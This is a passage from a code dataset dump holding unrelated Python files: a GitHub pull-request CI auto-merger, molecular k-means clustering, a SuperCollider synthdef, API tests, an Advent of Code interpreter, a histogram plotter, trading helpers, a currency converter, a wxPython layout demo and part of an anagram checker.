'snhack'\nrepo_name = 'LogoBot'\n\nrepos_rel_dir = '../../'\nprimary_repo_dir = 'LogoBot'\nstaging_repo_dir = primary_repo_dir + 'Staging'\n\nci_log_name = 'ci.log'\nprhist = []\n\ndef dict_in_array(dict, key, value):\n res = False\n for item in dict:\n if item[key] == value:\n res = True\n exit\n return res\n\ndef poll(un, pw, proxies):\n \n cilog = open(ci_log_name, 'a+')\n cilog.seek(0)\n \n # load cilog into prhist\n lines = cilog.readlines()\n for line in lines:\n line = line.split('_')\n num = int(line[0])\n dt = line[1]\n if not dict_in_array(prhist, 'number', num):\n prhist.append({'number':num, 'updated_at':dt})\n\n print(\"Polling for pull requests for commits...\")\n print(\"\")\n \n while True:\n print(strftime(\"%H:%M:%S\", gmtime()))\n print(\"Getting list of pull requests...\")\n \n r = requests.get('https://api.github.com/repos/'+repo_owner+'/'+repo_name+'/pulls', auth=(un, pw), proxies=proxies)\n \n jso = r.json()\n \n print(\" Found: \"+str(len(jso))+\" pull request(s)\")\n \n for p in jso:\n print(\"Checking: #\"+str(p['number']) + \" - \"+ p['title'] + \" by \"+p['user']['login'])\n \"\"\"\n print(p['body'])\n print(p['state'])\n print(p['merged_at'])\n print(p['updated_at'])\n \"\"\"\n \n # check if the pull request is ready to be merged\n if p['state'] == 'open' and p['merged_at']== None:\n \n # check if we've done it before?\n if not dict_in_array(prhist, 'number', p['number']): \n try:\n errorlevel = 0\n \n oplog = 'Build Log\\n---\\n'\n \n comments_url = p['_links']['comments']['href']\n \n # comment\n payload = {\n 'body':'CI: Starting build process...'\n }\n r = requests.post(comments_url, auth=(un, pw), proxies=proxies, data=json.dumps(payload))\n \n \n \n # Discard any local changes\n print(\" Clean working tree\")\n o = check_output(['git','reset'])\n o += check_output(['git','checkout','--','.'])\n o += check_output(['git','clean','-f'])\n print(o)\n oplog += \"\\nClean working tree\\n\"\n oplog += o\n \n print(\" Remote update\")\n o = check_output(['git','remote','update','-p'])\n print(o)\n oplog += \"\\nRemote Update\\n\"\n oplog += o\n \n # rebase to master\n print(\" Merge fast-forward master\")\n o = check_output(['git','merge','--ff-only','master'])\n print(o)\n oplog += \"\\nMerge fast-forward\\n\"\n oplog += o\n \n branch = p['head']['ref']\n \n print(\" Checkout master\")\n o = check_output(['git','checkout','master'])\n print(o)\n oplog += \"\\nCheckout master\\n\"\n oplog += o\n \n print(\" Merge branch: \"+branch)\n o = ''\n try:\n o = check_output(['git','merge','--strategy-option','theirs','--no-commit','origin/'+branch])\n print(o)\n except CalledProcessError as e:\n print(\" Error: \"+ str(e.returncode))\n errorlevel = e.returncode\n \n oplog += \"\\nMerge branch: origin/\"+branch+\"\\n\"\n oplog += o\n \n if errorlevel == 0: \n # Now run the build process \n print(\" Building\")\n \n os.chdir('hardware/ci')\n o = ''\n try:\n o = check_output(['./build.py'])\n print(o)\n except CalledProcessError as e:\n print(\" Error: \"+ str(e.returncode))\n errorlevel = 1\n \n os.chdir('../../')\n \n oplog += \"\\n\\nBuilding\\n--------\\n\"\n oplog += o\n \n \n if errorlevel == 0:\n print(\" Passed, auto-merging into master...\")\n \n # comment\n payload = {\n 'body':'CI: Build process successful - auto-merging into master\\n\\n' + oplog\n }\n r = requests.post(comments_url, auth=(un, pw), proxies=proxies, data=json.dumps(payload))\n \n # merge\n payload = {\n 'commit_message':p['title']\n }\n r = requests.put(p['_links']['self']['href'] + '/merge', \n auth=(un, pw), proxies=proxies, data=json.dumps(payload))\n print(r)\n \n else:\n print(\" Errors, adding to pull request comments...\")\n \n # log the error\n payload = {\n 'body':'CI: Unable to auto-merge, build process encountered errors\\n\\n' + oplog\n }\n r = requests.post(comments_url, auth=(un, pw), proxies=proxies, data=json.dumps(payload))\n \n \n \n # Log this request so we don't process it again\n hist = {'number':p['number'], 'updated_at':p['updated_at']}\n prhist.append(hist)\n cilog.write(str(p['number']) + '_' + p['updated_at'] + '_' + str(errorlevel)+'\\n')\n cilog.flush()\n \n print(\" Done\")\n \n \n except CalledProcessError as e:\n print(\"Error: \"+ str(e.returncode))\n else:\n print(\" Skipping\")\n \n else:\n print(\" Error: Pull request not open or already merged\")\n \n print(\"\")\n sleep(60)\n call(['clear'])\n \n cilog.close()\n \n\ndef ci(un, pw, http_proxy=\"\", https_proxy=\"\"):\n print(\"Continuous Integration\")\n print(\"----------------------\")\n \n proxies = {\n \"http\": http_proxy,\n \"https\": https_proxy,\n }\n \n print(\"\")\n print(\"Checking connection to github...\")\n \n r = requests.get('https://api.github.com/user', auth=(un, pw), proxies=proxies)\n if r.status_code == 200:\n print(\" OK\")\n \n print(\"Changing working directory...\")\n os.chdir(repos_rel_dir)\n \n print(\" Now in: \"+os.getcwd())\n \n print(\"Changing to staging dir: \"+staging_repo_dir)\n if os.path.isdir(staging_repo_dir):\n os.chdir(staging_repo_dir)\n print(\" OK\")\n \n # Could check for empty dir here and if so, do a git clone?\n # git clone git@github.com:snhack/LogoBot .\n \n contents = os.listdir('.')\n if len(contents) == 0:\n print(\" Staging empty - cloning repo\")\n o = check_output(['git','clone','git@github.com:'+repo_owner+'/'+repo_name,'.'])\n \n poll(un, pw, proxies)\n \n else:\n print(\" Error: Staging dir does not exist\")\n \n \n else:\n print(\" Error\")\n print(\" Status Code: \"+r.status_code)\n print(\" Response: \"+r.text)\n \n \n \n # o = check_output(['git','branch'])\n\nif __name__ == '__main__':\n if len(sys.argv) == 3:\n ci(sys.argv[1], sys.argv[2], \"\", \"\")\n elif len(sys.argv) > 3:\n ci(sys.argv[1], sys.argv[2], sys.argv[3], sys.argv[4])\n else:\n print(\"Usage: ci \")","sub_path":"ci/ci.py","file_name":"ci.py","file_ext":"py","file_size_in_byte":9452,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"373809529","text":"import os, random\nfrom collections import Counter\n\nfrom sklearn.cluster import MiniBatchKMeans, AgglomerativeClustering\nfrom sklearn.decomposition import PCA\nfrom sklearn.metrics import adjusted_rand_score, silhouette_score\nfrom rdkit import Chem\nfrom rdkit.Chem import AllChem\nimport numpy as np\nimport pandas as pd\n\ndef make_array(text):\n return np.fromstring(text.replace(\"[\", \"\").replace(\"]\", \"\"), sep=' ')\n\n\ndef read_one_csv(path):\n df = pd.read_csv(path)\n df['descriptors'] = df['descriptors'].apply(make_array)\n return df\n\n\ndef read_csvs(folder):\n df = pd.DataFrame(columns=[\"smiles\", \"descriptors\"])\n for filename in sorted(os.listdir(folder)):\n if filename.endswith('.csv'):\n full_path = os.path.join(folder, filename)\n df = df.append(read_one_csv(full_path), ignore_index=True)\n print(filename, \"finished\")\n return df\n\ndef kmeans_clustering(path, save_dir):\n df = read_csvs(path)\n print(len(df))\n # create a dictionary\n smiles_descriptors_dict = dict(zip(df.smiles, df.descriptors))\n print(\"Total number of molecules:\", len(smiles_descriptors_dict))\n # why is the length of this dictionary different than smiles and descriptors? Because of DUPLICATES!\n SUBSET_SIZE = 50000000\n start = 0\n cs = \"k-means++\"\n for i in range(SUBSET_SIZE, len(smiles_descriptors_dict)+SUBSET_SIZE, SUBSET_SIZE):\n # print step:\n print(\"ITERATION:\", i/SUBSET_SIZE)\n # set i to len(dict) if i > len(dict)\n if i > len(smiles_descriptors_dict):\n i = len(smiles_descriptors_dict)\n # take a subset of the dictionary\n print(\"Taking subset of the dictionary:\", start, i)\n dict_subset = {key: smiles_descriptors_dict[key] for key in list(smiles_descriptors_dict.keys())[start:i]}\n start = i\n # run minibatch kmeans\n print(\"starting minibatch kmeans\")\n kmeans = MiniBatchKMeans(n_clusters=39, batch_size=800, verbose=1, init=cs).fit(list(dict_subset.values()))\n cs = kmeans.cluster_centers_\n # create a new df with row1:smiles, row2:cluster label\n smiles_label_df = pd.DataFrame(list(zip(dict_subset.keys(), kmeans.labels_)), columns=[\"smiles\", \"labels\"])\n # save this df as csv\n if save_dir:\n smiles_label_df.to_csv(\"../data/labels/\" + save_dir + \".csv\")\n\n return kmeans\n\nif __name__ == \"__main__\":\n\n folder = \"../data/zinc15-minor-targets-features\"\n true_labels = {}\n for index, file in enumerate(sorted(os.listdir(folder))):\n if file.endswith(\".csv\"):\n df = pd.read_csv(os.path.join(folder, file))\n for _, row in df.iterrows():\n true_labels[row[\"smiles\"]] = index\n\n df = pd.read_csv(\"../data/labels/zinc15-minor-targets.csv\")\n ordered_true_labels = {}\n for _, row in df.iterrows():\n ordered_true_labels[row[\"smiles\"]] = true_labels[row[\"smiles\"]]\n\n df = pd.read_csv(\"../data/labels/zinc15-minor-targets.csv\", index_col=0)\n fps = {}\n for index, row in df.iterrows():\n if not (index % 10000):\n print(index)\n m = Chem.MolFromSmiles(row[\"smiles\"])\n fp = AllChem.GetMorganFingerprintAsBitVect(m, 2, nBits=1024).ToBitString()\n fps[row[\"smiles\"]] = np.frombuffer(fp.encode(), dtype='u1') - ord('0')\n\n print(\"fps completed...\")\n indices = random.sample(range(0, len(fps)), 50000) # randomly selected indices\n selected_fps = [list(fps.values())[i] for i in indices]\n print(\"values completed\")\n selected_smiles = [list(fps.keys())[i] for i in indices]\n print(\"keys completed\")\n selected_true_labels = []\n for sm in selected_smiles:\n selected_true_labels.append(true_labels[sm])\n\n print(\"starting pca\")\n pca = PCA(n_components=20).fit_transform(selected_fps)\n print(\"pca completed...\")\n\n sil_scores = []\n rand_scores = []\n sil_scores_120 = []\n rand_scores_120 = []\n less_than_120_k = []\n for i in range(20, 80, 5):\n # need to sample by index\n print(\"ITERATION:\", i)\n kmeans = MiniBatchKMeans(n_clusters=i, batch_size=800, init=\"k-means++\").fit(pca)\n print(\"kmeans completed...\")\n rs = adjusted_rand_score(selected_true_labels, kmeans.labels_)\n print(\"adjusted rand score:\", rs)\n rand_scores.append(rs)\n ss = silhouette_score(pca, kmeans.labels_)\n print(\"silhouette score:\", ss)\n sil_scores.append(ss)\n counter = Counter(kmeans.labels_)\n less_than_120 = []\n for k in range(len(pca)):\n if counter[kmeans.labels_[k]] < 120:\n continue\n less_than_120.append(pca[k])\n print(\"len_120:\", len(less_than_120))\n if len(less_than_120) < len(pca):\n less_than_120_k.append(i)\n kmeans = MiniBatchKMeans(n_clusters=i, batch_size=800, init=\"k-means++\").fit(less_than_120)\n print(\"kmeans completed...\")\n #rs = adjusted_rand_score(selected_true_labels, kmeans.labels_)\n #print(\"adjusted rand score:\", rs)\n #rand_scores_120.append(rs)\n ss = silhouette_score(less_than_120, kmeans.labels_)\n print(\"silhouette score:\", ss)\n sil_scores_120.append(ss)\n\n\n\n\n\n\n\n","sub_path":"featurizer/kmeans_clustering.py","file_name":"kmeans_clustering.py","file_ext":"py","file_size_in_byte":5220,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"438192420","text":"from supriya import synthdeftools\nfrom supriya import ugentools\n\n\ndef signal_block_pre(builder, source, state):\n #source = ugentools.Limiter.ar(\n # duration=ugentools.Rand.ir(0.005, 0.015),\n # source=source,\n # )\n return source\n\n\ndef signal_block(builder, source, state):\n frequencies, amplitudes, decay_times = [], [], []\n nyquist = ugentools.SampleRate.ir() / 2\n for _ in range(state.get('iterations') or 4):\n\n frequency = ugentools.ExpRand.ir(\n minimum=builder['frequency_minimum'],\n maximum=builder['frequency_maximum'],\n )\n\n coefficient = (nyquist - frequency) / nyquist\n amplitude = ugentools.ExpRand.ir() * (coefficient ** 2)\n decay_time = ugentools.Rand.ir(1, 2)\n\n frequencies.append(frequency)\n amplitudes.append(amplitude)\n decay_times.append(decay_time)\n\n specifications = [frequencies, amplitudes, decay_times]\n source = ugentools.Klank.ar(\n source=source,\n decay_scale=builder['decay_scale'],\n frequency_offset=builder['frequency_offset'],\n frequency_scale=builder['frequency_scale'],\n specifications=specifications,\n )\n return source\n\n\ndef signal_block_post(builder, source, state):\n source = ugentools.LeakDC.ar(source=source)\n source *= builder['gain'].db_to_amplitude()\n source = ugentools.Limiter.ar(\n duration=ugentools.Rand.ir(0.005, 0.015),\n source=source,\n )\n return source\n\n\nfactory = synthdeftools.SynthDefFactory(\n channel_count=2,\n decay_scale=1,\n frequency_offset=0,\n frequency_scale=1,\n gain=0,\n frequency_minimum=20,\n frequency_maximum=1000,\n )\nfactory = factory.with_input()\nfactory = factory.with_signal_block(signal_block_pre)\nfactory = factory.with_signal_block(signal_block)\nfactory = factory.with_signal_block(signal_block_post)\n\nnrt_klank_random_factory = factory \\\n .with_output(crossfaded=True, leveled=True, windowed=True) \\\n .with_rand_id()\nnrt_klank_random = nrt_klank_random_factory.build(name='klank_random')\n\n__all__ = (\n 'nrt_klank_random',\n 'nrt_klank_random_factory',\n )\n","sub_path":"pipermeth001/synthdefs/klank_random.py","file_name":"klank_random.py","file_ext":"py","file_size_in_byte":2156,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"579351472","text":"import requests\nimport pytest\n\nhost = 'http://localhost:16648'\nbase_url = host+'/api/v0/'\n\n\n@pytest.mark.skip(reason='re-enable this when we have additional logic here to get a working msg_id and email address')\ndef test_gmail_one_click_success():\n re = requests.get(base_url + 'gmail-oneclick/relay', params={\n 'token': 'kBfq3A0qc4ea4OLCQeZXJG1XEKNYih0Q6jCPwZ2D2SiAdb36jh4Bjci_rDQwpVgRaegPOcJut3xz1dgmF3l7KQ==',\n 'msg_id': 351192,\n 'email_address': 'email@email.com',\n 'cmd': 'claim',\n })\n assert re.status_code == 204\n\n\ndef test_gmail_one_click_bad_token():\n re = requests.get(base_url + 'gmail-oneclick/relay', params={\n 'token': 'faketoken',\n 'msg_id': 351192,\n 'email_address': 'foo@foo.com',\n 'cmd': 'claim',\n })\n assert re.status_code == 403\n","sub_path":"test/e2etest.py","file_name":"e2etest.py","file_ext":"py","file_size_in_byte":823,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"30936724","text":"# Day 19 part 1\n\neip = 0\neip_reg = 0\nregisters = [1, 0, 0, 0, 0, 0]\n\n\ndef parse(test_input):\n global eip_reg\n\n instructions = []\n with open(test_input) as f:\n first_line = True\n for line in f.readlines():\n line = line.strip()\n\n if first_line:\n eip_reg = int(line[4:])\n first_line = False\n else:\n split_line = line.split(\" \")\n instructions.append((split_line[0], split_line[1:]))\n\n return instructions\n\n\ndef print_out(orig, name, values):\n global eip, registers\n print(\"ip={} {} {} {} {}\".format(eip, orig, name, values, registers), flush=True)\n #input()\n\n\ndef run_instruction(instruction):\n global eip, registers\n\n name = instruction[0]\n values = list(map(lambda x: int(x), instruction[1]))\n a = values[0]\n b = values[1]\n c = values[2]\n\n orig = str(registers)\n\n registers[eip_reg] = eip\n\n if name == \"addr\":\n registers[c] = registers[a] + registers[b]\n elif name == \"addi\":\n registers[c] = registers[a] + b\n elif name == \"mulr\":\n registers[c] = registers[a] * registers[b]\n elif name == \"muli\":\n registers[c] = registers[a] * b\n elif name == \"banr\":\n registers[c] = registers[a] & registers[b]\n elif name == \"bani\":\n registers[c] = registers[a] & b\n elif name == \"borr\":\n registers[c] = registers[a] | registers[b]\n elif name == \"bori\":\n registers[c] = registers[a] | b\n elif name == \"setr\":\n registers[c] = registers[a]\n elif name == \"seti\":\n registers[c] = a\n elif name == \"gtir\":\n registers[c] = (1 if a > registers[b] else 0)\n elif name == \"gtri\":\n registers[c] = (1 if registers[a] > b else 0)\n elif name == \"gtrr\":\n registers[c] = (1 if registers[a] > registers[b] else 0)\n elif name == \"eqir\":\n registers[c] = (1 if a == registers[b] else 0)\n elif name == \"eqri\":\n registers[c] = (1 if registers[a] == b else 0)\n elif name == \"eqrr\":\n registers[c] = (1 if registers[a] == registers[b] else 0)\n\n #print_out(orig, name, values)\n\n eip = registers[eip_reg]\n eip += 1\n\n\nins = parse(\"input\")\n#print(ins)\nprint(eip_reg)\n\nwhile eip <= len(ins)-1:\n run_instruction(ins[eip])\n\nprint(registers)","sub_path":"19/adventofcode-19.1.py","file_name":"adventofcode-19.1.py","file_ext":"py","file_size_in_byte":2122,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"51698836","text":"#!/usr/bin/env python3\n\n\"\"\"histogram.py: simple histogram plotter.\n\n# http://matplotlib.org/examples/statistics/histogram_demo_cumulative.html\n\n# runme\n# $ echo -e \"1\\n2\\n1\\n2\\n3\\n1\\n4\\n\" | ./plotty-histogram.py - /tmp/bar.png\n\"\"\"\n\nimport argparse\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport math\nimport sys\n\n\ndefault_values = {\n 'debug': 0,\n 'title': '--title',\n 'label': '',\n 'col': 0,\n # number of bins for the histogram\n 'nbins': 50,\n 'sigma': None,\n 'filter': None,\n 'fmt': 'ro',\n 'sep': None,\n 'xlabel': '--xlabel',\n 'ylabel': '--ylabel',\n 'add_mean': False,\n 'add_median': False,\n 'xlim': ['-', '-'],\n 'ylim': ['-', '-'],\n 'infile': None,\n 'outfile': None,\n}\n\n# filter ops\nVALID_OPS = 'eq', 'ne'\n\ndef read_data(infile, options):\n # open infile\n if infile != sys.stdin:\n try:\n fin = open(infile, 'rb+')\n except IOError:\n print('Error: cannot open file \"%s\":', infile)\n else:\n fin = sys.stdin.buffer\n\n # read data\n data = fin.read()\n\n # split the input in lines\n data = data.decode('ascii').split('\\n')\n # remove comment lines\n data = [line for line in data if not line.startswith('#')]\n # break up each line in fields\n if options.sep is None:\n # use space and tab\n data = [item.replace('\\t', ' ') for item in data]\n sep = options.sep if options.sep is not None else ' '\n\n # filter lines\n if options.filter:\n new_data = []\n for row in data:\n if not row:\n continue\n for col, op, val in options.filter:\n field = row.split(sep)[int(col)]\n if ((op == 'eq' and field == val) or\n (op == 'ne' and field != val)):\n new_data.append(row)\n data = new_data\n\n if options.col == -1:\n x = range(len([row for row in data if row]))\n else:\n x = [float(row.split(sep)[options.col]) for row in data if row]\n # remove values way over the average\n if options.sigma is not None:\n total_x = sum(x)\n mean_x = total_x / len(x)\n stddev_x = math.sqrt(sum((i - mean_x) ** 2 for i in x) / (len(x) - 1))\n min_value = mean_x - (stddev_x * options.sigma)\n max_value = mean_x + (stddev_x * options.sigma)\n new_x = [i for i in x if i > min_value and i < max_value]\n if (len(x) - len(new_x)) / len(x) > 0.1:\n print('Ignoring sigma removal of outliers (at sigma: %f would be '\n 'dropping %f%% of the values' % (\n options.sigma, 100. * (len(x) - len(new_x)) / len(x)))\n else:\n if options.debug > 0:\n print('Removing %i of %i values sigma: %f stddev: %f '\n 'range: [%f, %f]' % (\n len(x) - len(new_x), len(x), options.sigma,\n stddev_x, min_value, max_value))\n x = new_x\n return x\n\n\ndef create_graph(x, options):\n # create figure\n fig, ax = plt.subplots(figsize=(8, 4))\n\n # plot the non-cumulative histogram\n n, bins, patches = ax.hist(x, options.nbins, histtype='step')\n\n # add median and average\n if options.add_median:\n plt.axvline(np.median(x), color='r', linestyle='dotted', linewidth=1)\n if options.add_mean:\n plt.axvline(np.mean(x), color='k', linestyle='dashed', linewidth=1)\n\n # tidy up the figure\n ax.grid(True)\n ax.legend(loc='right')\n ax.set_title(options.title)\n ax.set_xlabel(options.xlabel)\n ax.set_ylabel('Frequency of the value')\n\n # set xlim/ylim\n if options.xlim[0] != '-':\n plt.xlim(left=float(options.xlim[0]))\n if options.xlim[1] != '-':\n plt.xlim(right=float(options.xlim[1]))\n if options.ylim[0] != '-':\n plt.ylim(bottom=float(options.ylim[0]))\n if options.ylim[1] != '-':\n plt.ylim(top=float(options.ylim[1]))\n\n # plt.show()\n print('output is %s' % options.outfile)\n plt.savefig('%s' % options.outfile)\n\n\ndef get_options(argv):\n # parse opts\n parser = argparse.ArgumentParser(description=__doc__)\n parser.add_argument('-d', '--debug', action='count',\n dest='debug', default=default_values['debug'],\n help='Increase verbosity (multiple times for more)',)\n parser.add_argument('--quiet', action='store_const',\n dest='debug', const=-1,\n help='Zero verbosity',)\n parser.add_argument('--title', action='store',\n dest='title', default=default_values['title'],\n metavar='PLOTTITLE',\n help='use PLOTTITLE plot title',)\n parser.add_argument('-c', '--col', action='store', type=int,\n dest='col', default=default_values['col'],\n metavar='COL',\n help='use COL col',)\n parser.add_argument('-b', '--nbins', action='store', type=int,\n dest='nbins', default=default_values['nbins'],\n metavar='NBINS',\n help='use NBINS bins',)\n parser.add_argument('--sigma', action='store', type=float,\n dest='sigma', default=default_values['sigma'],\n metavar='SIGMA',\n help='use avg += (SIGMA * stddev) to remove outliers',)\n parser.add_argument('--filter', action='append', type=str, nargs=3,\n dest='filter', default=default_values['filter'],\n metavar=('COL', 'OP', 'VAL'),\n help='select only rows where COL OP VAL is true',)\n parser.add_argument('--sep', action='store', type=str,\n dest='sep', default=default_values['sep'],\n metavar='SEP',\n help='use SEP as separator',)\n parser.add_argument('--xlabel', action='store',\n dest='xlabel', default=default_values['xlabel'],\n metavar='XLABEL',\n help='use XLABEL x label',)\n parser.add_argument('--ylabel', action='store',\n dest='ylabel', default=default_values['ylabel'],\n metavar='YLABEL',\n help='use YLABEL x label',)\n parser.add_argument('--label', action='store',\n dest='label', default=default_values['label'],\n metavar='LABEL',\n help='use LABEL label',)\n parser.add_argument('--add-mean', action='store_const',\n dest='add_mean', const=True,\n default=default_values['add_mean'],\n help='Add a line at the mean',)\n parser.add_argument('--add-median', action='store_const',\n dest='add_median', const=True,\n default=default_values['add_median'],\n help='Add a line at the median',)\n parser.add_argument('--xlim', action='store', type=str, nargs=2,\n dest='xlim', default=default_values['xlim'],\n metavar=('left', 'right'),)\n parser.add_argument('--ylim', action='store', type=str, nargs=2,\n dest='ylim', default=default_values['ylim'],\n metavar=('bottom', 'top'),)\n parser.add_argument('infile', type=str,\n default=default_values['infile'],\n metavar='input-file',\n help='input file',)\n parser.add_argument('outfile', type=str,\n default=default_values['outfile'],\n metavar='output-file',\n help='output file',)\n # do the parsing\n options = parser.parse_args(argv[1:])\n\n # check the filter\n if options.filter:\n\n def is_int(s):\n if s[0] in ('-', '+'):\n return s[1:].isdigit()\n return s.isdigit()\n\n def is_op(s):\n return s in VALID_OPS\n for col, op, val in options.filter:\n assert is_int(col) and is_op(op), 'invalid filter: %s %s %s' % (\n col, op, val)\n return options\n\n\ndef main(argv):\n # parse options\n options = get_options(argv)\n # get infile/outfile\n if options.infile == '-':\n options.infile = sys.stdin\n if options.outfile == '-':\n options.outfile = sys.stdout\n # print results\n if options.debug > 2:\n print(options)\n # create the graph\n x = read_data(options.infile, options)\n create_graph(x, options)\n\n\nif __name__ == '__main__':\n # at least the CLI program name: (CLI) execution\n main(sys.argv)\n","sub_path":"plotty-histogram.py","file_name":"plotty-histogram.py","file_ext":"py","file_size_in_byte":8754,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"15819357","text":"#!/usr/bin/python\n\"\"\"xquant公共定义及公用函数\"\"\"\n\nimport utils.tools as ts\n\nSIDE_BUY = \"BUY\"\nSIDE_SELL = \"SELL\"\n\nORDER_TYPE_LIMIT = \"LIMIT\"\nORDER_TYPE_MARKET = \"MARKET\"\n\nORDER_STATUS_WAIT = \"wait\"\nORDER_STATUS_OPEN = \"open\"\nORDER_STATUS_CLOSE = \"close\"\nORDER_STATUS_CANCELLING = \"cancelling\"\nORDER_STATUS_CANCELLED = \"cancelled\"\n\n\ndef creat_symbol(target_coin, base_coin):\n \"\"\"create symbol\"\"\"\n return \"%s_%s\" % (target_coin.lower(), base_coin.lower())\n\n\ndef get_symbol_coins(symbol):\n \"\"\"获取coins\"\"\"\n coins = symbol.split(\"_\")\n return tuple(coins)\n\n\ndef create_balance(coin, free, frozen):\n \"\"\" 创建余额 \"\"\"\n return {\"coin\": coin, \"free\": free, \"frozen\": frozen}\n\n\ndef get_balance_free(balance):\n \"\"\" 获取可用数 \"\"\"\n return ts.str_to_float(balance[\"free\"])\n\n\ndef get_balance_frozen(balance):\n \"\"\" 获取冻结数 \"\"\"\n return ts.str_to_float(balance[\"frozen\"])\n\n\ndef create_signal(side, pst_rate, rmk, can_buy_after=None):\n \"\"\"创建交易信号\"\"\"\n return {\"side\": side, \"pst_rate\": pst_rate, \"rmk\": rmk, \"can_buy_after\": can_buy_after}\n\n\ndef decision_signals(signals):\n \"\"\"决策交易信号\"\"\"\n sdf = pd.DataFrame(signals)\n sdf_min = sdf.groupby(\"side\")[\"pst_rate\"].min()\n\n if xq.SIDE_SELL in sdf_min:\n return xq.SIDE_SELL, sdf_min[xq.SIDE_SELL]\n\n if xq.SIDE_BUY in sdf_min:\n return xq.SIDE_BUY, sdf_min[xq.SIDE_BUY]\n\n return None, None\n\n\ndef decision_signals2(signals):\n \"\"\"决策交易信号\"\"\"\n if not signals:\n return None, None, None, None\n\n side = None\n for signal in signals:\n new_side = signal[\"side\"]\n new_rate = signal[\"pst_rate\"]\n new_rmk = signal[\"rmk\"]\n new_cba = signal[\"can_buy_after\"]\n\n if side is None:\n side = new_side\n rate = new_rate\n rmk = new_rmk\n cba = new_cba\n elif side is new_side:\n if rate > new_rate:\n rate = new_rate\n rmk = new_rmk\n elif rate == new_rate:\n rmk += \", \" + new_rmk\n if new_cba:\n if cba:\n if new_cba > cba:\n cba = new_cba\n else:\n cba = new_cba\n\n else:\n if side is SIDE_BUY:\n side = new_side\n rate = new_rate\n rmk = new_rmk\n cba = new_cba\n\n return side, rate, rmk, cba\n","sub_path":"common/xquant.py","file_name":"xquant.py","file_ext":"py","file_size_in_byte":2484,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"381443332","text":"\"\"\"currency.py: a module for currency exchange\nThis module provides several string parsing functions to implement a \nsimple currency exchange routine using an online currency service. \nThe primary function in this module is exchange.\n__author__ = \"GuoXiao\"\n__pkuid__ = \"1700011795\"\n__email__ = \"1700011795@pku.edu.cn\"\n\"\"\"\n\n\ndef exchange(currency_from, currency_to, amount_from):\n \"\"\"This function is designed for changing the currency of current to the\ncurrency of target according to imported information.\n\"\"\"\n from urllib.request import urlopen\n errorlist=[\"f\",\"a\",\"l\",\"s\",\"e\"]\n wrong=\"Wrong import! Please check your abbreviation of the currency and rerun this program!\"\n numlist=[]\n orderlist=[]\n amttolist=[]\n amount_to=\"\"\n webname=\"http://cs1110.cs.cornell.edu/2016fa/a1server.php?from=\"\n website=webname+currency_from+\"&to=\"+currency_to+\"&amt=\"+str(amount_from)\n doc = urlopen(website)\n docstr = doc.read()\n doc.close()\n jstr = docstr.decode('ascii')\n jstr = list(jstr)\n for s in range(len(jstr)-5):\n if jstr[s]==errorlist[0]and jstr[s+1]==errorlist[1]and jstr[s+2]==errorlist[2]and jstr[s+3]==errorlist[3]and jstr[s+4]==errorlist[4]:\n return wrong\n else:\n continue\n for i in range(len(jstr)):\n if jstr[i] in \"1234567890\":\n numlist.append(jstr[i])\n orderlist.append(i)\n for j in range(len(orderlist)-1):\n if orderlist[j]+1==orderlist[j+1] or orderlist[j]+2==orderlist[j+1]:\n continue\n else:\n orderorigin=orderlist[j+1]\n orderoforderorigin=j+1\n for s in range(j+1,len(orderlist),1):\n amttolist.append(numlist[s])\n for i in range(orderoforderorigin,len(orderlist)-1,1): \n if orderlist[i]+2==orderlist[i+1]:\n orderofpoint=i+1-orderoforderorigin\n amttolist.insert(orderofpoint,\".\")\n for h in range(len(amttolist)):\n amount_to=amount_to+amttolist[h]\n amount_to=float(amount_to)\n return amount_to\n\n\ndef test_exchange():\n \"\"\"text if the function 'exchange' is all right\"\"\"\n assert(exchange(\"USD\",\"EUR\",8.3842)==7.026756099)\n\ndef testAll():\n \"\"\"text all the functions\"\"\"\n test_exchange()\n print(\"All tests passed\")\n\ndef main():\n print(\"Welcome!\")\n testAll()\n cf=input(\"Please enter the abbreviation of your current currency:\")\n ct=input(\"Please enter the abbreviation of your target currency:\")\n af=float(input(\"Please enter the amount of your current currency:\"))\n result=exchange(cf,ct,af)\n if type(result)==type(2.00):\n print(\"The result is:%r\" % result +\" \"+ct)\n print(\"Thanks for using this service!\")\n elif type(result)==type(\"Right\"):\n print (result)\n\n\nif __name__==\"__main__\":\n main()\n","sub_path":"pyassign2/currency.py","file_name":"currency.py","file_ext":"py","file_size_in_byte":2800,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"413260962","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n#-----------------------------------------------------------------------------\n# Purpose: Basic grid sizer.\n#-----------------------------------------------------------------------------\n\nimport wx\nfrom blockwindow import BlockWindow\n\nlabels = ['one', 'two', 'three', 'four', 'five', 'six', 'seven', 'eight', 'nine']\n\nclass GridSizerFrame(wx.Frame):\n\n def __init__(self):\n super(self.__class__, self).__init__(parent=None, id=-1, title='Basic Grid Sizer')\n sizer = wx.GridSizer(rows=3, cols=3, hgap=5, vgap=5)\n\n for label in labels:\n bw = BlockWindow(parent=self, label=label)\n sizer.Add(item=bw, proportion=0, flag=0, border=0)\n\n self.SetSizer(sizer)\n self.Fit()\n\nclass GridSizerApp(wx.App):\n\n def OnInit(self):\n frame = GridSizerFrame()\n frame.Show()\n self.SetTopWindow(frame)\n return True\n\nif __name__ == '__main__':\n\n app = GridSizerApp()\n app.MainLoop()\n\n\n\n","sub_path":"sizer/basic_grid_sizer_1.py","file_name":"basic_grid_sizer_1.py","file_ext":"py","file_size_in_byte":1004,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"224320614","text":"import sys\n\ndef check_anagram(w1, w2):\n\tfor letter in w1:\n\t\tif letter in w2:\n\t\t\tw2 = w2.replace(letter, '', 1)\n\t\telse:\n\t\t\treturn False\n\n\tif w2 == \"\":\n\t\treturn True\n\telse:\n\t\treturn False\n\nfor line in sys.stdin:\n\twords = 